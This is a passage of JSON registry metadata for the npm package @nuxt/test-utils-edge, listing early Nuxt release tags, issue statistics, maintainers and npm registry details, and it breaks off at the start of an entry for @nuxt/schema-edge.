a":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:51:55.467Z","dependent_packages_count":17,"downloads":5910,"downloads_period":"last-month","dependent_repos_count":64,"rankings":{"downloads":0.9908171301298093,"dependent_repos_count":1.7580303300624445,"dependent_packages_count":1.523284342413811,"stargazers_count":0.1640420041154648,"forks_count":0.5445612240325104,"docker_downloads_count":1.5518833653781645,"average":1.0887697326887007},"purl":"pkg:npm/%40nuxt/test-utils-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/test-utils-edge","docker_dependents_count":2,"docker_downloads_count":85,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/test-utils-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/test-utils-edge/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftest-utils-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftest-utils-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftest-utils-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftest-utils-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftest-utils-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftest-utils-edge/codemeta","maintainers":[{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2026-02-11T11:03:13.514Z","updated_at":"2026-02-11T11:03:13.514Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-12-13T15:19:47.649Z","updated_at":"2023-12-13T15:19:47.649Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096116,"name":"@nuxt/schema-edge","ecosystem":"npm","description":"[![Nuxt banner](./.github/assets/banner.svg)](https://nuxt.com)","homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1633,"first_release_published_at":"2021-11-21T16:07:15.004Z","latest_release_published_at":"2023-03-07T21:15:02.125Z","latest_release_number":"4.0.0-27970394.60d07df4","last_synced_at":"2026-05-11T01:23:25.865Z","created_at":"2022-04-08T10:39:29.571Z","updated_at":"2026-05-11T01:23:25.866Z","registry_url":"https://www.npmjs.com/package/@nuxt/schema-edge","install_command":"npm install 